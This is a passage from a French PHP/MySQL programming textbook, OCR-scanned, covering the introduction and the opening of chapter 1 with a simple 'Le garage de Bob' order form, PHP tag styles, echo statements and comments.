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Vous vous interessez au developpement web avec PHP et MySQL ? Ce livre est fait 
pour vous ! Vous y trouverez nos experiences les plus utiles sur PHP et MySQL, deux 
des plus passionnants outils de developpement web du moment. 

Les points forts de ce livre 

Ce livre vous expliquera comment creer des sites web interactifs, de leur expression la 
plus simple a des sites interactifs du Web 2.0 en passant par les sites de commerce elec- 
tronique securises et complexes. Vous apprendrez egalement a vous servir des technologies 
open-source. 

Ce livre est destine aux lecteurs qui connaissent deja au minimum les bases du 
langage HTML et ont 1' habitude de programmer dans un langage de programmation 
moderne, mais qui ne connaissent pas necessairement la programmation sur Internet 
ou les bases de donnees relationnelles. Si vous etes un programmeur debutant, ce 
livre devrait egalement vous interesser, mais il vous faudra peut-etre un peu plus de 
temps pour l'assimiler. Nous avons essaye de n'oublier aucun concept fondamental, 
toutefois, certains d'entre eux seront presentes assez rapidement. Ce livre est done 
principalement destine aux lecteurs qui souhaitent maitriser PHP et MySQL pour 
implementer un site web commercial ou de qualite professionnelle. Si vous utilisez 
deja un langage de developpement pour le Web, cet ouvrage devrait vous mettre rapi- 
dement sur la bonne voie. 

Nous avons ecrit la premiere edition de ce livre lorsque nous nous sommes rendu 
compte que tous les ouvrages existants consacres a PHP se limitaient a une simple 
enumeration de ses fonctions. Ces livres sont naturellement tres utiles, mais ils ne sont 
d'aucune aide lorsque votre patron ou un client vous demande : "Implementez-moi un 
panier virtuel pour mon site de commerce electronique." Nous avons fait de notre 
mieux pour que tous nos exemples soient aussi utiles que possible. La plupart des 
programmes peuvent etre utilises directement sur votre site web ; les autres ne necessi- 
teront que quelques modifications mineures. 
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Ce que vous apprendrez en lisant ce livre 

Si vous avez deja implements des sites web en HTML pur, vous avez deja compris les 
limites de cette approche : ils sont tout simplement trop statiques. lis restent identiques 
jusqu'a ce que vous les mettiez a jour vous-meme. En outre, les utilisateurs ne peuvent 
pas interagir avec ce type de site, en tout cas de maniere interessante. 

L'utilisation d'un langage comme PHP et d'une base de donnees comme MySQL 
permet de rendre vos sites dynamiques : ils pourront alors etre personnalises et mis a 
jour en temps reel. 

Des les premiers chapitres, nous nous sommes deliberement concentres sur des applications 
reelles et pratiques. Nous commencerons par etudier un systeme simple de commande en 
ligne, et nous continuerons avec les differentes parties de PHP et de MySQL. 

Nous aborderons ensuite differents aspects du commerce electronique et de la securite, 
puisqu'il s'agit de deux composants importants des sites web, et nous montrerons 
comment les implementer avec PHP et MySQL. 

Dans la derniere section de ce livre, nous verrons comment attaquer le developpement 
de projets reels et passerons en revue la conception, la planification et 1' implementation 
des projets suivants : 

■ authentication des utilisateurs et personnalisation d'un site ; 

■ paniers virtuels ; 

■ systemes de messagerie web ; 

■ gestionnaires de listes de diffusion ; 

■ forums web ; 

■ production de documents PDF ; 

■ services web avec XML et SOAP ; 

■ applications web 2.0 avec Ajax. 

Tous ces projets sont utilisables tels quels ou peuvent etre modifies en fonction de vos 
besoins. Nous les avons choisis parce que nous pensons qu'ils sont representatifs des 
applications web auxquelles les programmeurs sont le plus souvent confrontes. Si vos 
besoins sont differents, ce livre devrait toutefois vous aider a atteindre vos objectifs. 

Presentation de PHP 

PHP est un langage de script cote serveur qui a ete concu specifiquement pour le Web. 
Le code PHP est inclus dans une page HTML et sera execute a chaque fois qu'un visiteur 
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affichera la page. Le code PHP est interprete au niveau du serveur web et genere du 
code HTML ou toute autre donnee affichable dans le navigateur de l'utilisateur. 

PHP a ete concu en 1994 par Rasmus Lerdorf. II a ensuite ete adopte par d'autres 
personnes talentueuses et reecrit quatre fois avant de devenir le produit abouti que nous 
connaissons aujourd'hui. En novembre 2007, il etait installe sur plus de 21 millions de 
domaines et sa croissance est rapide. Vous trouverez des statistiques plus recentes sur le 
site http://www.php.net/usage.php. 

PHP est un projet open-source, ce qui signifie que vous pouvez vous procurer son code, 
l'utiliser, le modifier et le redistribuer gratuitement. 

PHP signifiait a l'origine Personal Home Page, mais ce nom a ete change en un acro- 
nyme recursif comme GNU (Gnu's Not Unix) : il signifie maintenant PHP Hypertext 
Preprocessor. 

La derniere version principale de PHP est la version 5. Elle beneficie d'une reecriture 
complete du moteur Zend et de quelques ameliorations importantes au niveau du 
langage. 

La page d'accueil de PHP est accessible a l'adresse http://www.php.net. 

La page de Zend Technologies, l'entreprise des fondateurs de PHP, se trouve a l'adresse 
http://www.zend.com. 

Presentation de MySQL 

MySQL est un systeme de gestion de bases de donnees relationnelles (SGBDR) robuste 
et rapide. Une base de donnees permet de manipuler les informations de maniere effi- 
cace, de les enregistrer, de les trier, de les lire et d'y effectuer des recherches. Le serveur 
MySQL controle Faeces aux donnees pour s' assurer que plusieurs utilisateurs peuvent 
se servir simultanement d'une meme base de donnees pour y acceder rapidement et 
pour garantir que seuls les utilisateurs autorises peuvent acceder aux donnees. MySQL 
est done un serveur multi-utilisateur et multithread. II utilise SQL (Structured Query 
Language), le langage standard des requetes de bases de donnees. MySQL est disponi- 
ble depuis 1996, mais son developpement remonte a 1979. II s'agit de la base de 
donnees open-source la plus employee au monde et elle a recu le Linux Journal 
Readers' Choice Award a plusieurs reprises. 

MySQL est desormais disponible sous une double licence. Vous pouvez l'utiliser 
gratuitement sous licence open-source (GPL) a condition de respecter les termes de 
cette licence. Si vous souhaitez distribuer une application non GPL incluant MySQL, 
vous pouvez aussi acheter une licence commerciale. 
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Pourquoi utiliser PHP et MySQL ? 

Lors de 1' implementation d'un site web, vous avez le choix entre de nombreux produits. 
Vous devez notamment choisir : 

■ la plate-forme materielle du serveur web ; 

■ un systeme d' exploitation ; 

■ un logiciel de serveur web ; 

■ un systeme de gestion de base de donnees ; 

■ un langage de programmation ou de script. 

Certains de ces choix dependent directement des autres. Tous les systemes d' exploitation 
ne fonctionnent pas sur toutes les plates-formes ; par exemple, tous les serveurs web ne 
reconnaissent pas tous les langages de programmation, etc. 

Dans ce livre, nous ne nous interesserons pas particulierement au materiel, a votre 
systeme d' exploitation ou a votre logiciel de serveur web. Nous n'en avons pas besoin 
car l'une des caracteristiques interessantes de PHP et de MySQL tient a ce qu'ils fonc- 
tionnent avec tous les systemes d' exploitation les plus connus et avec la plupart des 
autres. 

Un script PHP peut, dans la plupart des cas, etre ecrit de facon a etre portable entre les 
systemes d' exploitation et les serveurs web. Certaines fonctions sont directement liees 
aux specificites d'un systeme de fichiers particulier, mais elles sont clairement identifiees 
comme telles dans le manuel de reference et dans ce livre. 

Quels que soient votre plate-forme, votre systeme d' exploitation ou votre serveur web, 
nous pensons que PHP et MySQL sont des options tres interessantes. 

Quelques avantages de PHP 

Les principaux concurrents de PHP sont Perl, ASP.NET de Microsoft, Ruby (avec ou 
sans Rails), Java Server Pages (JSP) et ColdFusion. 

Par rapport a tous ces produits, PHP possede plusieurs avantages significatifs : 

■ les performances ; 

■ l'adaptabilite ; 

■ des interfaces vers differents systemes de bases de donnees ; 
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■ des bibliotheques integrees pour la plupart des taches web ; 

■ un faible cout ; 

■ la simplicite d'utilisation et d'apprentissage ; 

■ un bon support oriente objet ; 

■ la portabilite ; 

■ la souplesse dans le processus de developpement ; 

■ la disponibilite de son code source ; 

■ la disponibilite du support et de la documentation. 

Performances 

PHP est tres rapide. Avec un seul serveur d'entree de gamme, vous pouvez servir des 
millions de requetes par jour. Les tests de performances publies par Zend Technologies 
(http://www.zend.com) montrent que PHP depasse tous ses concurrents. 

Ada ptabi lite 

PHP utilise ce que Rasmus Lerdorf designe souvent comme une architecture "sans 
partage". Cela signifie que vous pouvez implementer de facon efficace et a peu de frais 
une ferme de serveurs en ajoutant des machines en fonction de vos besoins. 

Integration avec les bases de donnees 

PHP dispose de connexions natives vers la plupart des systemes de bases de donnees. 
Outre MySQL, vous pouvez vous connecter directement aux bases de donnees 
PostgreSQL, Oracle, dbm, FilePro, DB2, Informix, InterBase et Sybase, pour ne citer 
qu'elles. PHP 5 possede egalement une interface SQL integree, SQLite, pour gerer les 
fichiers plats. 

En fait, grace au standard ODBC (Open Database Connectivity), vous pouvez vous 
connecter a n'importe quelle base de donnees possedant un pilote ODBC, ce qui est le 
cas des produits Microsoft, notamment. 

Outre ces bibliotheques natives, PHP dispose d'une couche d'abstraction pour l'acces 
aux bases de donnees : PDO (PHP Database Objects) autorise ainsi une certaine cohe- 
rence et facilite la prise en compte de la securite lors de l'acces aux bases. 

Bibliotheques integrees 

PHP ayant ete congu pour etre utilise sur le Web, il possede de nombreuses fonc- 
tions integrees permettant d'effectuer la plupart des taches de programmation web. 
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Vous pouvez ainsi generer des images en temps reel, vous connecter a des services 
web et a d'autres services reseaux, analyser des documents XML, envoyer du courrier 
electronique, manipuler les cookies et produire des documents PDF avec seulement 
quelques lignes de code. 

Cout 

PHP est gratuit. Vous pouvez vous procurer la derniere version du langage sur le site 
http://www.php.net, sans payer quoi que ce soit. 

Facilite d'apprentissage de PHP 

La syntaxe de PHP repose sur celle d'autres langages de programmation, essentiel- 
lement C et Perl. Si vous savez deja programmer en C, en Perl ou en un autre 
langage analogue, comme C++ ou Java, l'apprentissage de PHP sera quasiment 
immediat. 

Support oriente objet 

PHP 5 possede des fonctionnalites orientees objet bien concues. Si vous avez appris a 
programmer en Java ou en C++, vous disposerez en PHP des fonctionnalites (et, gene- 
ralement, de la syntaxe) dont vous avez 1' habitude : 1' heritage, les attributs et les metho- 
des prives et proteges, les classes et les methodes abstraites, les interfaces, les 
constructeurs et les destructeurs, notamment. Vous decouvrirez egalement des mecanis- 
mes moins courants, comme les iterateurs. Certaines de ces fonctionnalites etaient 
disponibles dans PHP 3 et 4, mais le support oriente objet de la version 5 est bien plus 
complet. 

Portabilite 

PHP est disponible sur de nombreux systemes d' exploitation. Vous pouvez ecrire votre 
code PHP pour des systemes d' exploitation Unix libres et gratuits, comme Linux ou 
FreeBSD, pour des versions commerciales d'Unix comme Solaris, IRIX, OS-X ou pour 
les differentes versions de Windows. 

Un code PHP bien ecrit pourra done generalement etre utilise sans modification sur un 
autre systeme. 

Souplesse dans le processus de developpement 

PHP permet d'implementer simplement les traitements simples, mais vous pouvez tout 
aussi facilement implementer de grosses applications a l'aide d'un framework reposant 
sur les patrons de conception, comme Modele-Vue-Controleur (MVC). 
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Code source 

Le code source de PHP est disponible gratuitement. Contrairement aux produits 
commerciaux, dont les sources ne sont pas distribues, vous avez done la possibilite de 
modifier le langage ou d'y ajouter de nouvelles caracteristiques. 

Vous n'avez par consequent plus besoin d'attendre que les concepteurs distribuent des 
correctifs logiciels et n'avez plus a craindre la disparition de la societe ou 1' arret du 
support du produit que vous utilisez. 

Disponibilite du support et de la documentation 

Zend Technologies (www.zend.com), l'entreprise qui est a l'origine du moteur de PHP, 
finance son developpement en offrant des services de support et des logiciels lies sous 
forme commerciale. 

La documentation et la communaute PHP fournissent un grand nombre de ressources et 
d' informations completes sur le langage. 

Nouveautes de PHP 5 

II se peut que vous soyez recemment passe de l'une des versions PHP 4.x a PHP 5. 
Comme on est en droit de l'attendre dans une nouvelle version majeure, d'importantes 
modifications ont vu le jour et le moteur Zend de PHP a ete reecrit pour cette version. 
Voici les principales nouvelles fonctionnalites : 

a un meilleur support oriente objet construit autour d'un modele objet entierement 
nouveau (voir Chapitre 6) ; 

I la gestion des exceptions pour un traitement evolutif des erreurs, facilitant la main- 
tenance (voir Chapitre 7) ; 

■ SimpleXML pour une gestion simplified des donnees XML (voir Chapitre 31). 

Parmi les autres modifications, notons encore le deplacement de certaines extensions de 
1' installation PHP par defaut dans la bibliotheque PECL, 1' amelioration de la gestion 
des flux et l'ajout de SQLite. 

Au moment ou nous ecrivons ce livre, la version courante de PHP est la 5.2 et la 
version 5.3 se profile a l'horizon. PHP 5.2 ajoute un certain nombre de fonctionnalites 
interessantes : 

■ une nouvelle extension pour filtrer les entrees, afin d'ameliorer la securite ; 

■ 1' extension JSON pour ameliorer l'interoperabilite avec JavaScript ; 

■ le suivi de la progression des depots de fichiers ; 
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■ une meilleure gestion des dates et des heures ; 

■ de nombreuses bibliotheques clientes ameliorees et des performances encore 
accrues (le moteur Zend utilise une meilleure gestion de la memoire) ; 

a de nombreux bogues corriges. 
Quelques avantages de MySQL 

Les principaux concurrents de MySQL sont PostgreSQL, Microsoft SQL Server et Oracle. 
MySQL possede sur eux plusieurs avantages : 

■ des performances elevees ; 

■ un cout reduit ; 

■ une simplicite de configuration et d'apprentissage ; 

■ sa portabilite ; 

■ l'accessibilite de son code source ; 

■ la disponibilite du support. 

Performances 

MySQL est indeniablement un systeme rapide. Vous pouvez consulter les statistiques 
de ses performances sur le site http://web.mysql.com/why-mysql/benchmark.html. 

La plupart des tests montrent que MySQL est bien plus rapide que ses concurrents, de 
plusieurs ordres de grandeur. En 2002, eWeek a publie un banc d'essais qui comparait 
cinq bases de donnees alimentant une application web. Le meiileur resultat a place ex 
cequo MySQL et Oracle, qui est pourtant un produit bien plus cher. 

Cout reduit 

MySQL est disponible gratuitement sous une licence open-source ou, pour un prix tres 
raisonnable, sous licence commerciale. Vous devez vous procurer une licence si vous 
souhaitez redistribuer MySQL dans une application et que vous ne souhaitiez pas que 
1' application se trouve sous licence open-source. Si vous ne comptez pas distribuer 
votre application (ce qui est generalement le cas de la plupart des applications web) ou 
si vous travaillez sur un logiciel open-source, il n'est pas necessaire d'acheter une 
licence. 

Simplicite d'emploi 

La plupart des bases de donnees modernes utilisent SQL. Si vous connaissez deja 
d'autres SGBDR, vous ne devriez pas avoir de probleme pour vous adapter. En outre, 
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MySQL est plus simple a installer que la plupart des produits similaires. La courbe 
d'apprentissage necessaire a l'acquisition des competences d'un administrateur de base 
de donnees (DBA, ou DataBase Administrator) est bien plus courte que celle des autres 
bases de donnees. 

Portabilite 

MySQL peut etre utilise sur un grand nombre de systemes Unix, ainsi qu'avec 
Windows. 

Code source 

Comme pour PHP, vous pouvez vous procurer le code source de MySQL. Pour la 
plupart des utilisateurs, ce point n'est pas important, mais il doit vous tranquilliser 
1' esprit en vous assurant une continuite future et en vous offrant des possibilites en cas 
d'urgence. 

Disponibilite du support 

Tous les produits open-source n'ont pas une entreprise parente qui propose des services 
de support, de formations, de consultation et de certification : vous pouvez obtenir tout 
cela de la part de MySQL AB (www.mysql.com). 

Nouveautes de MySQL 5 

Parmi les modifications majeures introduites par MySQL 5, nous citerons les suivantes : 

■ les vues ; 

■ les procedures stockees (voir Chapitre 13) ; 

■ un support minimal des triggers ; 

■ le support des curseurs. 

On peut egalement noter une meilleure compatibilite avec le standard ANSI et des 
ameliorations en matiere de vitesse. 

Si vous utilisez toujours une ancienne version 4.x ou 3.x du serveur MySQL, vous 
devez savoir que les fonctionnalites suivantes ont ete ajoutees aux differentes versions 
depuis la version 4.0 : 

■ support des sous-requetes ; 

■ types GIS pour stacker les donnees geographiques ; 

■ support ameliore pour l'internationalisation ; 
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■ moteur de stockage transactionnel InnoDB inclus en standard ; 

■ cache de requetes MySQL pour ameliorer fortement la vitesse des requetes repetitives 
souvent produites par les applications web. 

Ce livre utilise MySQL 5.1 (Beta Community Edition), qui ajoute les fonctionnalites 
suivantes : 

■ partitionnement ; 

■ replication par lignes ; 

■ programmation des evenements ; 

■ tables de log ; 

■ ameliorations de MySQL Cluster, du schema d' informations, des processus de 
sauvegarde ; 

S nombreuses corrections de bogues. 

Organisation de ce livre 

Ce livre est decoupe en cinq parties. 

La premiere partie presente les differents elements du langage PHP, ainsi que quelques 
exemples. Tous ces exemples sont pratiques, issus de notre experience dans l'imple- 
mentation d'un site de commerce electronique, et non theoriques. La presentation de 
PHP debute avec le Chapitre 1 : si vous connaissez deja le langage, vous pouvez passer 
directement au chapitre suivant. Si vous debutez en PHP ou en programmation, en 
revanche, il peut etre interessant de vous y arreter un peu plus longuement. Si vous 
connaissez deja PHP 4, consultez quand meme le Chapitre 6 car les fonctionnalites 
orientees objet ont sensiblement change. 

La deuxieme partie aborde les concepts necessaries a 1' utilisation des systemes de bases 
de donnees relationnelles, comme MySQL, l'utilisation de SQL, 1' interconnexion de 
votre base de donnees MySQL avec le monde exterieur, en passant par PHP et certains 
concepts avances de MySQL, comme la securite et les optimisations. 

La troisieme partie est consacree aux problemes generaux qui peuvent survenir lors du 
developpement d'un site web dans n'importe quel langage. Les problemes les plus 
importants concernent la securite. Nous verrons ensuite comment vous pouvez tirer 
profit de PHP et de MySQL pour authentifier vos utilisateurs et collecter, transmettre et 
enregistrer vos donnees en toute securite. 

La quatrieme partie s'interesse plus precisement aux principales fonctions integrees dans 
PHP. Nous avons selectionne des groupes de fonctions qui vous interesseront surement 



Introduction 1 1 



lorsque vous implementerez un site web. Vous y apprendrez notamment ce qu'est l'inte- 
raction avec le serveur, l'interaction avec le reseau, la generation d'images, les manipu- 
lations de date et d'heure et les variables de sessions. 

La cinquieme et derniere partie est notre preferee : nous y etudierons quelques proble- 
mes reels, comme la gestion et le suivi de projets importants, ainsi que le debogage des 
applications. Nous presenterons egalement quelques projets mettant en evidence la 
puissance et la flexibilite de PHP et de MySQL. 

Encore un mot 

Nous esperons que ce livre vous satisfera et que vous serez aussi passionne par 
l'apprentissage de PHP et de MySQL que nous l'avons ete lorsque nous avons 
commence a nous servir de ces logiciels. Leur utilisation est un plaisir a part entiere. 
Vous serez bientot a meme de rejoindre les milliers de developpeurs web qui se servent 
de ces outils puissants et robustes pour construire des sites web dynamiques. 
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Ce chapitre expose succinctement la syntaxe et les constructions du langage PHP. Les 
programmeurs PHP y trouveront peut-etre 1' occasion de completer leurs connaissances sur 
le sujet. L' etude de ce chapitre sera plus facile et plus rapide pour ceux qui possedent des 
notions de base sur d'autres langages de programmation, comme C, Perl ou ASP 

Dans cet ouvrage, l'apprentissage qui vous est propose repose sur de nombreux exem- 
ples du monde reel, tires de l'experience des auteurs en matiere de conception de sites 
web. Les manuels de programmation exposent souvent la syntaxe de base en 
s'appuyant sur des exemples simples mais notre parti pris est different. Nous pensons 
qu'il est preferable d'apprendre un langage de programmation en realisant des projets 
operationnels, plutot qu'assimiler un recueil de fonctions et un expose de la syntaxe qui 
n'apportent guere plus que le manuel en ligne. 

En consequence, nous vous proposons de vous faire la main sur les exemples donnes 
ici ; vous pouvez les saisir ou les charger a partir du site Pearson (www.pearson.fr), 
les modifier, en isoler des extraits et apprendre a les adapter a vos besoins. 

Dans ce chapitre, vous verrez comment utiliser les variables, les operateurs et les 
expressions en construisant un formulaire de commande en ligne. Nous etudierons 
egalement les types de variables et les priorites des operateurs. Vous apprendrez ensuite 
a acceder aux variables des formulaires et a manipuler celles-ci afin de calculer le 
montant total et les taxes dans un bon de commande emis par un client. 

Nous poursuivrons le developpement de cet exemple en inserant dans notre script PHP 
le code necessaire a un controle de la validite des donnees entrees par l'utilisateur. A 
cette occasion, nous presenterons le concept de valeurs booleennes, ainsi que plusieurs 
exemples d'utilisation des instructions if, else et switch et de l'operateur ?:. 

Enfm, nous aborderons les boucles en ecrivant du code PHP generant une structure de 
tableau HTML de facon repetitive. 



16 Partiel 



Utilisation de PHP 



Utilisation de PHP 

La realisation et 1' execution des exemples presentes dans cet ouvrage necessitent d' avoir 
acces a un serveur web sur lequel PHP est installe. Pour tirer le meilleur parti des exemples 
et des cas d'ecole traites ici, il est conseille de les executer et d'essayer de les modifier. 
Pour cela, vous avez besoin d'une installation de test ou vous puissiez experimenter a loisir. 

Si PHP n'est pas installe sur votre ordinateur, vous devez commencer par proceder a 
son installation ou contacter votre administrateur systeme pour qu'il s'en charge. Vous 
trouverez a l'Annexe A, "Installation de PHP et de MySQL", une description de la 
procedure d' installation. 



Formulaires HTML 

Le traitement des formulaires HTML constitue une des applications les plus courantes 
que doivent prendre en charge les langages de script executes cote serveur. C'est pour- 
quoi nous allons commencer 1' apprentissage de PHP par 1' implementation d'un formu- 
laire de commande pour une entreprise Active de vente de pieces detachees denommee 
Le garage de Bob. Vous trouverez tout le code relatif a cette application modele dans le 
repertoire chapitreOl sur le site Pearson. 

Code du formulaire 

Nous allons partir du stade ou le programmeur de l'entreprise a etabli un formulaire 
permettant aux clients de passer des commandes (voir Figure 1.1). II s'agit d'un formu- 
laire simple, comparable aux nombreux autres publics sur le Web. 



Figure 1.1 

Le formulaire initial 
de Bob n'enregistre 
que les articles 
et leurs quantites 
respectives. 



Le garage de Bob 



GD T (eXii.) (L_;tjO -(E 



Le garage de Bob 

Formulaire de commande 



Articles 
Pntus 

Huilcs 
Bougies 



Quantitc 

I I 



( Passer commande") 



A partir de ce formulaire, Bob veut en premier lieu recuperer la liste des articles 
commandes par son client, etablir le montant total de la commande, ainsi que le 
montant des taxes a payer sur cette commande. 
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Une partie du code HTML generant ce formulaire est presentee dans le Listing 1.1 . 

Listing 1.1 : orderform.html — Code HTML generant le formulaire basique 
de commande de Bob 



<form action="processorder. php" method=post> 
<table border=0> 

<tr bgcolor=#cccccc> 

<td width=150>Articles</td> 
<td width=15>Quantite</td> 
</tr> 
<tr> 
<td>Pneus</td> 

<td align="center"><input type="text" name="qte_pneus" 
size="3" maxlength="3"></td> 

</tr> 
<tr> 
<td>Huiles</td> 

<td align="center"><input type="text" name="qte_huiles" 
size="3" maxlength="3"></td> 

</tr> 
<tr> 

<td>Bougies</td> 

<td align="center"><input type="text" name="qte_bougies" 
size="3" maxlength="3"></td> 

</tr> 
<tr> 

<td colspan="2" align="center"> 

<input type="submit" value="Passer commande"> 
</td> 
</tr> 
</table> 
</f orm> 



Tout d'abord, notez que l'attribut action de la balise form de ce formulaire a pour 
valeur le nom du script PHP qui va traiter la commande du client (et que nous ecrirons un 
peu plus loin). En general, la valeur affectee a l'attribut action est l'URL a charger lorsque 
l'utilisateur appuie sur le bouton submit. Les donnees saisies par l'utilisateur dans le 
formulaire sont alors transmises a cette URL, via la methode specifiee dans l'attribut 
method, c'est-a-dire soit get (dans ce cas, les donnees sont specifiees a la fin de l'URL), 
soit post (dans ce cas, les donnees sont transmises sous forme d'un paquet separe). 

Notez egalement les noms des champs du formulaire (qte pneus, qte huiles et 
qte bougies) : comme nous les utiliserons dans notre script PHP, il est important de 
choisir des noms explicites facilement memorisables. Certains editeurs HTML generent 
par defaut des noms de champs tels que f ield23 mais il est difficile de s'en souvenir 
lorsque Ton ecrit ensuite le script. Pour faciliter votre travail de programmeur PHP, 
nous vous conseillons d' adopter des noms qui refletent la nature des donnees entrees 
dans les champs. 
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Vous devriez meme adopter une convention pour denommer les noms des champs lors 
de la creation d'un site web ; de cette facon, les noms des champs se conformeront au 
meme format sur l'ensemble du site. Une telle convention peut, par exemple, stipuler 
que les noms de champ sont obtenus en abregeant les mots et en remplacant les espaces 
par des blancs soulignes. 

Traitement du formulaire 

Pour traiter le formulaire, nous devons creer le script processorder . php auquel renvoie 
la valeur de l'attribut action de la balise form. Dans votre editeur de texte, tapez le code 
suivant et sauvegardez-le sous ce nom : 

<html> 
<head> 

<title>Le garage de Bob - Resultats de la commande</title> 
</head> 
<body> 

<h1>Le garage de Bob</h1> 
<h2>Resultats de la commande</h2> 
</body> 
</html> 

Vous remarquerez que ces lignes ne sont que du code HTML. Nous allons a present leur 
aj outer du code PHP. 

Incorporation de code PHP dans du code HTML 

Sous la balise de titre <h2>, saisissez les lignes suivantes : 
<? 

echo ' <p>Commande traitee.'; 

?> 

Enregistrez votre fichier, puis chargez-le dans votre navigateur web en remplissant le 
formulaire de Bob et en cliquant sur le bouton Passer commande. La Figure 1.2 montre 
le resultat que vous devez alors obtenir. 

Figure 1.2 

Le texte passe a une 
instruction echo de 
PHP est affiche dans 
le navigateur web. 



OOO Le garage de Bob - Resultats de I... CD 




Le garage de Bob 
Resultats de la commande 

Commande traitde. 
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Notez comment le code PHP a ete incorpore dans un fichier HTML "normal". Affichez 
la source de la page dans votre navigateur. Voici le code que vous devriez voir : 

<html> 
<head> 

<title>Le garage de Bob - Resultats de la commande</title> 
</head> 
<body> 

<h1>Le garage de Bob</h1> 

<h2>Resultats de la commande</h2> 

<p>Commande traitee. 

</body> 

</html> 

Le code PHP brut n'est pas affiche tel quel dans le navigateur. En effet, l'interpreteur 
PHP analyse le script et le remplace par le resultat de son execution. A partir d'un 
script PHP, nous pouvons ainsi produire du code HTML directement affichable dans un 
navigateur, sans que le navigateur comprenne le langage PHP. 

Cet exemple illustre le concept de programmation web cote serveur : le code PHP est 
interprete et execute sur le serveur web, contrairement au code JavaScript et aux autres 
technologies cote client, qui sont interpretees et executees par le navigateur, sur l'ordi- 
nateur de l'utilisateur. 

Le code contenu dans le fichier considere ici se compose de quatre elements : 

■ du HTML ; 

■ des balises PHP ; 

■ des instructions PHP ; 

■ des espaces. 

Nous pouvons egalement y ajouter des commentaires. 

La plupart des lignes de cet exemple sont simplement du code HTML. 

Balises PHP 

Dans l'exemple precedent, le code PHP commence par les caracteres <? et se 
termine par les caracteres ?>. Cette syntaxe est comparable a la syntaxe des balises 
du HTML, qui commencent elles aussi par le caractere < (inferieur a) et se terminent 
par le caractere > (superieur a). Ces symboles sont appeles balises PHP et indiquent 
au serveur web ou commence et ou finit le code PHP. Tout texte place entre ces bali- 
ses est interprete comme du code PHP et tout texte situe en dehors est traite comme 
du code HTML normal. Les balises PHP permettent ainsi de "s'echapper" du 
contexte HTML. 

II existe differents types de balises. Examinons-les plus en detail. 
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Styles des balises PHP 

II existe actuellement quatre styles differents de balises PHP. Les differents fragments 
de code qui suivent sont equivalents. 

B Style XML : 

<?php echo "<p>Commande traitee."; ?> 

II s'agit du style de balise qui sera employe dans ce livre. Ce style est le style de refe- 
rence a utiliser avec PHP 3 et PHP 4 car l'administrateur du serveur ne peut pas le 
desactiver, ce qui vous garantit sa disponibilite sur tous les serveurs et qui est particu- 
lierement important si vous ecrivez des applications qui peuvent etre utilisees sur 
differentes installations. Ce style de balise est compatible avec des documents XML 
(extensible Markup Language). Nous vous conseillons d'utiliser ce style de balise. 

■ Style abrege : 

<? echo "<p>Commande traitee."; ?> 

Ce style de balise est le plus simple ; il respecte le style des instructions de traite- 
ment SGML (Standard Generalized Markup Language). Pour utiliser ce type de 
balise, qui est le plus rapide a saisir au clavier, vous devez autoriser 1' option 
open tag dans votre fichier de configuration ou compiler PHP en activant les bali- 
ses abregees. Vous trouverez plus d' informations concernant ce style de balise dans 
1' Annexe A. Nous vous deconseillons de l'utiliser car il ne fonctionnera pas dans de 
nombreux environnements puisqu'il n'est plus active par defaut. 

a Style SCRIPT: 

<SCRIPT LANGUAGE= ' php ' > echo "<p>Commande traitee."; </SCRIPT> 

Ce style de balise est le plus long et le plus familier pour les utilisateurs de Java- 
Script ou de VBScript. Vous pouvez l'adopter si votre editeur HTML pose probleme 
avec les autres styles de balise. 

■ Style ASP: 

<% echo "<p>Commande traitee."; %> 

Ce style de balise est analogue au style utilise dans les pages ASP (Active Server Pages) 
ou ASP.NET. Pour 1' employer, vous devez activer le parametre de configuration 
asp tags. Vous n'avez aucune raison d'utiliser ce style, sauf si votre editeur de texte est 
oriente ASP ou ASP.NET. Notez que, par defaut, ce style de balise est desactive. 

Instructions de PHP 

Pour informer l'interpreteur PHP des actions a entreprendre, il faut inserer des instruc- 
tions entre les balises PHP d'ouverture et de fermeture. 
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Dans l'exemple considere ici, nous n'utilisons qu'un seul type d'instruction : 

echo "<p>Commande traitee."; 

Vous l'avez deja probablement devine, l'emploi de la construction echo se traduit par 
un resultat tres simple : l'affichage dans la fenetre du navigateur de la chaine qui lui est 
passee en parametre. Notez le point-virgule place a la fin de l'instruction echo. Le 
point-virgule s'emploie pour separer les instructions PHP les unes des autres, tout 
comme le point s'emploie pour separer des phrases en francais. Si vous avez deja 
programme en C ou en Java, cette syntaxe ne vous est pas etrangere. 

L'oubli d'un point-virgule en fin d'instruction est une erreur de syntaxe tres repandue. 
Cette erreur est toutefois facile a detecter et a corriger. 

Espaces 

Les caracteres d'espacement, tels que les nouvelles lignes (retour chariot), les espaces 
et les tabulations, constituent ce que Ton appelle des espaces. Vous le savez probable- 
ment deja, les navigateurs ignorent les espaces dans le code HTML. II en va de meme 
avec le moteur PHP. 

Soit les deux fragments HTML suivants : 

<h1>Bienvenue dans le garage de Bob !</h1><p>Que voulez-vous commander aujourd'hui ? 

et 

<h1 >Bienvenue dans le garage 

de Bob !</h1> 

<p>Que voulez-vous commander 
aujourd'hui ? 

L execution de ces deux fragments donne le meme resultat a l'affichage parce qu'ils 
apparaissent comme identiques pour le navigateur web. Vous pouvez toutefois utiliser 
des espaces dans votre code HTML et vous etes meme fortement encourage a le faire 
avec soin pour ameliorer la lisibilite de votre code. II en va de meme en PHP. Rien ne 
vous oblige a inserer des espaces entre des instructions PHP, mais vous obtiendrez des 
programmes PHP beaucoup plus lisibles si vous placez vos instructions sur des lignes 
separees. Par exemple : 

echo ' bonjour ' ; 
echo ' a tous ' ; 

et 

echo 'bonjour ';echo 'a tous'; 
sont equivalentes, mais la premiere version est bien plus lisible. 
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Commentaires 

Les commentaires places dans les programmes sont en quelque sorte des indications 
ecrites a l'intention des personnes qui lisent le code. Vous pouvez inserer des commen- 
taires pour expliquer les actions du script, indiquer l'auteur du script, expliquer pour- 
quoi 1' implementation a ete effectuee de telle maniere, donner la date de derniere 
modification et ainsi de suite. En general, tous les scripts PHP contiennent des 
commentaires, a 1' exception peut-etre des plus simples. 

L'interpreteur PHP ignore tout le texte place dans un commentaire. Plus precisement, 
l'analyseur PHP saute les commentaires, comme s'il s'agissait d'espaces. 

Le langage PHP supporte les commentaires de style C, C++ et shell. 

Voici un commentaire de plusieurs lignes ecrit dans le style C et qui pourrait figurer au 
debut d'un script PHP : 

/* Auteur : Bob Smith 

Date de derniere modification : 10 avril 
Ce script traite les commandes client. 

*/ 

Les commentaires sur plusieurs lignes doivent etre encadres par les paires de caracteres 
/* et */. Tout comme en C, il est interdit d'imbriquer des commentaires multiligne. 

Vous pouvez egalement inserer des commentaires d'une seule ligne, soit dans le style 
C++ : 

echo '<p>Commande traitee.'; // Debut de l'affichage 

